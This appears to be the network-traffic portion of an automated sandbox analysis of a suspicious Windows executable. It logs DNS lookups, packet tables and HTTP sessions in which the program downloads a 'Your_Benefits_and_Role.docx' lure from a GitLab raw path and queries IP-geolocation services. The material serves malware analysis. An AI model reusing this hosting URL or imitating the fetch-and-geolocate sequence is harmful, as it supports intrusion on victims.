                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700706005 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700712919 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700748920 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700768948 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700781107 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700812101 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700817108 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700830936 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700850010 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700885057 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700900078 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700928926 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700933933 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700949907 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700968981 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.700997114 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.701014996 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.701045036 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.701050043 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.701062918 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.701390982 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.701405048 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.701416969 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.701447964 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.701452971 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.701474905 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.701483011 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.741704941 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.786519051 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.786531925 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.786695957 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.786696911 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.786760092 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.787051916 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.787069082 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.787105083 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.787127972 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.787154913 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.787174940 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.787590027 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.787605047 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.787652969 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.787667036 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.787709951 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.787998915 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788012981 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788050890 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788067102 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788089037 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788106918 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788361073 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788372040 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788418055 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788429022 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788474083 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788703918 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788714886 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788758993 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788769960 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.788815022 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.789088011 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.789104939 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.789136887 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.789151907 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.789172888 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.789206982 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.789249897 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.888032913 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.888681889 CET49778443192.168.2.4172.65.251.78
                                                                                                                                                                                                        Jan 14, 2025 12:40:26.888720989 CET44349778172.65.251.78192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.221234083 CET49779443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.221335888 CET44349779104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.221427917 CET49779443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.221673965 CET49779443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.221693993 CET44349779104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.679363012 CET44349779104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.679568052 CET49779443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.680881977 CET49779443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.680915117 CET44349779104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.681140900 CET44349779104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.682013035 CET49779443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.723409891 CET44349779104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.816560030 CET44349779104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.816612005 CET44349779104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.816912889 CET49779443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.816914082 CET49779443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.817879915 CET49780443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.817970991 CET44349780104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.818043947 CET49780443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.818198919 CET49780443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.818223953 CET44349780104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.123382092 CET49779443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.123452902 CET44349779104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.279937983 CET44349780104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.280421019 CET49780443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.280482054 CET44349780104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.280869007 CET49780443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.280881882 CET44349780104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.422113895 CET44349780104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.422168970 CET44349780104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.422385931 CET49780443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.422621012 CET49780443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.422642946 CET44349780104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.434381008 CET4978180192.168.2.4208.95.112.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.439363003 CET8049781208.95.112.1192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.440057993 CET4978180192.168.2.4208.95.112.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.440120935 CET4978180192.168.2.4208.95.112.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.445065022 CET8049781208.95.112.1192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.896256924 CET8049781208.95.112.1192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.896544933 CET4978180192.168.2.4208.95.112.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.901760101 CET8049781208.95.112.1192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.901827097 CET4978180192.168.2.4208.95.112.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.933890104 CET49782443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.933955908 CET44349782104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.934036016 CET49782443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.946069002 CET49782443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.946108103 CET44349782104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.418576002 CET44349782104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.425734997 CET49782443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.425796032 CET44349782104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.426367998 CET49782443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.426381111 CET44349782104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.564358950 CET44349782104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.564400911 CET44349782104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.564465046 CET49782443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.564620018 CET49782443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.564660072 CET44349782104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.565310955 CET49783443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.565344095 CET44349783104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.565408945 CET49783443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.565557957 CET49783443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:29.565579891 CET44349783104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.051697016 CET44349783104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.053071976 CET49783443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.053098917 CET44349783104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.053592920 CET49783443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.053596973 CET44349783104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.196928024 CET44349783104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.196995020 CET44349783104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.197227001 CET49783443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.197302103 CET49783443192.168.2.4104.26.13.205
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.197314978 CET44349783104.26.13.205192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.198246002 CET4978480192.168.2.4208.95.112.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.203205109 CET8049784208.95.112.1192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.203288078 CET4978480192.168.2.4208.95.112.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.203368902 CET4978480192.168.2.4208.95.112.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.208297968 CET8049784208.95.112.1192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.659450054 CET8049784208.95.112.1192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.660327911 CET4978480192.168.2.4208.95.112.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.665534019 CET8049784208.95.112.1192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.665596008 CET4978480192.168.2.4208.95.112.1
                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.285111904 CET5778553192.168.2.41.1.1.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.292404890 CET53577851.1.1.1192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.355453968 CET6381753192.168.2.41.1.1.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.362193108 CET53638171.1.1.1192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:01.274151087 CET5544053192.168.2.41.1.1.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:01.281599045 CET53554401.1.1.1192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.212897062 CET6299453192.168.2.41.1.1.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.220452070 CET53629941.1.1.1192.168.2.4
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.423291922 CET6513753192.168.2.41.1.1.1
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.430124044 CET53651371.1.1.1192.168.2.4
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.285111904 CET192.168.2.41.1.1.10xcc52Standard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.355453968 CET192.168.2.41.1.1.10x6169Standard query (0)gitlab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 14, 2025 12:40:01.274151087 CET192.168.2.41.1.1.10x3f18Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.212897062 CET192.168.2.41.1.1.10x834fStandard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.423291922 CET192.168.2.41.1.1.10x7513Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.292404890 CET1.1.1.1192.168.2.40xcc52No error (0)google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 14, 2025 12:40:00.362193108 CET1.1.1.1192.168.2.40x6169No error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 14, 2025 12:40:01.281599045 CET1.1.1.1192.168.2.40x3f18No error (0)www.google.com142.250.185.228A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.220452070 CET1.1.1.1192.168.2.40x834fNo error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.220452070 CET1.1.1.1192.168.2.40x834fNo error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 14, 2025 12:40:27.220452070 CET1.1.1.1192.168.2.40x834fNo error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.430124044 CET1.1.1.1192.168.2.40x7513No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                        • gitlab.com
                                                                                                                                                                                                        • google.com
                                                                                                                                                                                                        • www.google.com
                                                                                                                                                                                                        • api.ipify.org
                                                                                                                                                                                                        • ip-api.com
                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.449781208.95.112.1806944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.440120935 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                                        Jan 14, 2025 12:40:28.896256924 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:28 GMT
                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                        Content-Length: 306
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        X-Ttl: 60
                                                                                                                                                                                                        X-Rl: 44
                                                                                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        1192.168.2.449784208.95.112.1806944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.203368902 CET53OUTGET /json/8.46.123.189 HTTP/1.1
                                                                                                                                                                                                        Host: ip-api.com
                                                                                                                                                                                                        Jan 14, 2025 12:40:30.659450054 CET483INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:29 GMT
                                                                                                                                                                                                        Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                        Content-Length: 306
                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                        X-Ttl: 58
                                                                                                                                                                                                        X-Rl: 43
                                                                                                                                                                                                        Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                                                                                        Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        0192.168.2.449742172.65.251.784436944C:\Users\user\Desktop\#U2800.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2025-01-14 11:40:00 UTC107OUTGET /app8490744/updatesa/-/raw/main/Your_Benefits_and_Role.docx?inline=false HTTP/1.1
                                                                                                                                                                                                        Host: gitlab.com
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC528INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Tue, 14 Jan 2025 11:40:01 GMT
                                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                                        Content-Length: 16036
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        CF-Ray: 901d5949ff4f0dc7-EWR
                                                                                                                                                                                                        CF-Cache-Status: HIT
                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                        Cache-Control: max-age=60, public, must-revalidate, stale-while-revalidate=60, stale-if-error=300, s-maxage=60
                                                                                                                                                                                                        Content-Disposition: attachment; filename="Your_Benefits_and_Role.docx"; filename*=UTF-8''Your_Benefits_and_Role.docx
                                                                                                                                                                                                        ETag: "c9f854e67f415052529ad6dc8e14658c"
                                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC2134INData Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 72 65 63 61 70 74 63 68 61 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 72 65 63 61 70 74 63 68 61 2e 6e 65 74 2f 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 6e 73 2e 68 74 6d 6c 20 68 74 74 70 73 3a 2f 2f 2a 2e 7a 75 6f 72 61 2e 63 6f 6d 2f 61 70 70 73 2f 50 75 62 6c 69 63 48 6f 73 74 65 64 50 61 67 65 4c 69 74 65 2e 64 6f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 64 6d 69 6e 2f 20 68 74 74 70 73 3a 2f 2f 67 69 74 6c 61 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f
                                                                                                                                                                                                        Data Ascii: content-security-policy: base-uri 'self'; child-src https://www.google.com/recaptcha/ https://www.recaptcha.net/ https://www.googletagmanager.com/ns.html https://*.zuora.com/apps/PublicHostedPageLite.do https://gitlab.com/admin/ https://gitlab.com/assets/
                                                                                                                                                                                                        2025-01-14 11:40:01 UTC504INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 36 64 54 74 7a 47 49 5a 38 6f 6f 76 53 75 51 25 32 42 4f 36 38 50 34 4f 6a 4d 52 45 54 54 4e 50 4e 25 32 42 73 41 53 46 72 52 37 65 4a 59 59 6b 71 38 6c 6b 37 38 78 56 64 35 25 32 42 54 4d 50 58 47 6e 76 36 6d 72 72 5a 4b 6b 59 65 46 46 6e 32 50 54 69 6b 74 39 75 41 51 38 59 62 72 30 25 32 42 61 68 74 34 6b 4c 41 32 65 69 70 52 35 6f 6c 39 5a 35 61 70 25 32 42 61 6b 66 46 69 47 43 61 70 4a 50 49 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 4e
                                                                                                                                                                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6dTtzGIZ8oovSuQ%2BO68P4OjMRETTNPN%2BsASFrR7eJYYkq8lk78xVd5%2BTMPXGnv6mrrZKkYeFFn2PTikt9uAQ8Ybr0%2Baht4kLA2eipR5ol9Z5ap%2BakfFiGCapJPI%3D"}],"group":"cf-nel","max_age":604800}N
